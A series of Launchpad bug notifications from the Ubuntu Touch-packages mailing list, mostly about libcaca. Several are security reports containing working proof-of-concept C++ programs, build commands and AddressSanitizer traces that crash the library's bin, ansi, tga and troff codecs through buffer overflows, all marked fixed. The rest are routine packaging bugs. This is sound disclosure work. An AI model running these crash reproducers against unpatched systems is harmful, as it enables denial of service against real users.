[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
was solved in 0.99.beta20-1

** Changed in: libcaca (Ubuntu)
       Status: Triaged => Fix Released

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca:
  Fix Released
Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello Ubuntu security team,

  issues: https://github.com/cacalabs/libcaca/issues/56

  System info:
  Ubuntu 20.04: clang 10.0.0, gcc 9.3.0
  Fedora 33: clang 11.0.0, gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1. Get the source code of libcaca
  2. Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make

  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
  $ make

  3. Create the poc_bin.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  /* The system header names were lost from the archived message;
     these are the headers this code needs. */
  #include <stdint.h>
  #include <stdio.h>

  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    /* Import the raw bytes with the "bin" importer. */
    caca_import_canvas_from_memory(cv,Data,Size,"bin");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){

    size_t len = 0;
    unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
    len = sizeof(buffer)/sizeof(unsigned char);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));
    crash((const uint8_t*)buffer,len);

    return 0;

  }

  4. Compile poc_bin.cc

  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin

  5. Run poc_bin

  asan info:

  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
      #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33
      #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
      #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
      #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
      #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
      #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
      [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
  HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
        (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  ==3817476==ABORTING

  Thanks

[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi
was solved in 0.99.beta20-1

** Changed in: libcaca (Ubuntu)
       Status: Triaged => Fix Released

--
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

Status in libcaca:
  Fix Released
Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello Ubuntu security team,

  issues: https://github.com/cacalabs/libcaca/issues/55

  System info:
  Ubuntu 20.04: clang 10.0.0, gcc 9.3.0
  Fedora 33: clang 11.0.0, gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1. Get the source code of libcaca
  2. Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make

  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
  $ make

  3. Create the poc_ansi.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  /* The system header names were lost from the archived message;
     these are the headers this code needs. */
  #include <stdint.h>
  #include <stdio.h>

  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    /* Import the raw bytes with the "ansi" importer. */
    caca_import_canvas_from_memory(cv,Data,Size,"ansi");
    caca_free_canvas(cv);
    cv=NULL;

  }

  int main(int args,char* argv[]){

    size_t len = 0;
    unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
    len = sizeof(buffer)/sizeof(unsigned char);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));
    crash((const uint8_t*)buffer,len);

    return 0;

  }

  4. Compile poc_ansi.cc

  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi

  5. Run poc_ansi

  asan info:

  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
      #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38
      #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
      #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
      #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
      #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)

  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
      #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
      [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable
  HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
        (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  ==3763372==ABORTING

  Thanks

[Touch-packages] [Bug 1229282] Re: libcaca ftbfs in saucy (pdftex errors)
** Changed in: libcaca (Ubuntu)
       Status: Confirmed => Fix Released

--
https://bugs.launchpad.net/bugs/1229282

Title:
  libcaca ftbfs in saucy (pdftex errors)

Status in libcaca package in Ubuntu:
  Fix Released
Status in libcaca package in Debian:
  Fix Released

Bug description:
  ! Missing number, treated as zero.
  <to be read again>
                     \relax
  l.9 \-  \_\-\-\_\-extern char const $\ast$const $\ast$ \hyperlink{group__caca_...
  A number should have been here; I inserted `0'.
  (If you can't figure out why I needed to see a number,
  look up `weird error' in the index to The TeXbook.)

  ! Illegal unit of measure (pt inserted).
  <to be read again>
                     \relax
  l.9 \-  \_\-\-\_\-extern char const $\ast$const $\astmake[3]: *** [stamp-latex] Error 1
  make[3]: Leaving directory `/build/buildd/libcaca-0.99.beta18/doc'
  make[2]: *** [all-recursive] Error 1
  make[2]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
  make[1]: *** [all] Error 2
  make[1]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
  make: *** [build-arch-stamp] Error 2
  dpkg-buildpackage: error: debian/rules build gave error exit status 2

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1229282/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu)
       Status: Confirmed => Fix Released

--
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Hello Ubuntu Security Team,

  I use libFuzzer to test the libcaca API. I found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53
  - https://github.com/cacalabs/libcaca/issues/54

  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  ## Affected Product Code Base
  libcaca e4968ba

  ## Affected Component
  affected component: libcaca.so

  ## Affected source code file
  affected source code file (as call stack):
  -> caca_export_canvas_to_memory() in libcaca/caca/codec/export.c
  -> caca_export_memory() in libcaca/caca/codec/export.c
  -> export_tga() in libcaca/caca/codec/export.c
  -> export_troff() in libcaca/caca/codec/export.c

  ## Attack Type
  Context-dependent

  ## Impact Denial of Service
  true

  ## Reference
  https://github.com/cacalabs/libcaca

  ## Discoverer
  fdgnneig

  ## Verification process and POC
  ### Verification steps:
  1. Get the source code of libcaca:
  2. Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make
  ```

  3. Run POC.sh to compile poc_troff.cc, poc_tga.cc
  4. Run POC

  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  /* The system header names were lost from the archived message;
     these are the headers this code needs. */
  #include <stdint.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  using namespace std;

  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if(Size<8) return 0;
    size_t len=0;
    char* buffer = (char*)malloc(Size+1);
    memset(buffer,0,Size);
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    /* Export through the "troff" exporter; len receives the output size. */
    void* reData = caca_export_canvas_to_memory(cv,"troff",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    cv=NULL;
    free(buffer);
    buffer=NULL;
    return 0;
  }

  int main(int args,char* argv[]){
    size_t len = 0;
    unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
    len = sizeof(buffer)/sizeof(unsigned char);
    LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));
    return 0;
  }
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff

  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  /* The system header names were lost from the archived message;
     these are the headers this code needs. */
  #include <stdint.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  using namespace std;

  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if(Size<8) return 0;
    size_t len=0;
    char* buffer = (char*)malloc(Size+1);
    memset(buffer,0,Size);
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    /* Export through the "tga" exporter; len receives the output size. */
    void* reData = caca_export_canvas_to_memory(cv,"tga",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    cv=NULL;
    free(buffer);
    buffer=NULL;
    return 0;
  }

  int main(int args,char* argv[]){
    size_t len = 0;
    unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
    len = sizeof(buffer)/sizeof(unsigned char);
    LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
    printf("%zu\n",sizeof(buffer)/sizeof(unsigned char));
    return 0;
  }
  EOF
  ```

[Touch-packages] [Bug 1789022] Re: libcaca0 still depends on old libncursesw5 and libtinfo5
** Changed in: libcaca (Ubuntu)
       Status: Fix Committed => Fix Released

--
https://bugs.launchpad.net/bugs/1789022

Title:
  libcaca0 still depends on old libncursesw5 and libtinfo5

Status in libcaca package in Ubuntu:
  Fix Released

Bug description:
  Ubuntu Cosmic switched some time ago from ncurses5 to ncurses6.
  However, the package libcaca0 still depends on old libncursesw5 and
  libtinfo5 instead of libncursesw6 and libtinfo6.

[Touch-packages] [Bug 1910391] [NEW] Lightdm is not working on minimal DE install without recommends
Public bug reported:

I tried to install Focal with a minimal DE, without installing recommends, and then installed lightdm. On Debian it works "out of the box"; on Ubuntu it does not, lightdm fails to start. I saw that the issue is a missing greeter: on Debian it is correctly listed as a dependency, while in the Ubuntu packages it is only a recommends. Moving it from recommends to depends will solve this.

** Affects: lightdm (Ubuntu)
     Importance: Undecided
         Status: New

--
https://bugs.launchpad.net/bugs/1910391

Title:
  Lightdm is not working on minimal DE install without recommends

Status in lightdm package in Ubuntu:
  New

[Touch-packages] [Bug 1320422] Re: Please merge dbus 1.8.2-1 (main) from Debian testing (main)
Updating dbus should also solve the latest cjs failure to build.

--
https://bugs.launchpad.net/bugs/1320422

Title:
  Please merge dbus 1.8.2-1 (main) from Debian testing (main)

Status in “dbus” package in Ubuntu:
  In Progress

Bug description:
  I'm working on a debdiff to resync our dbus package with the current
  version in Debian testing.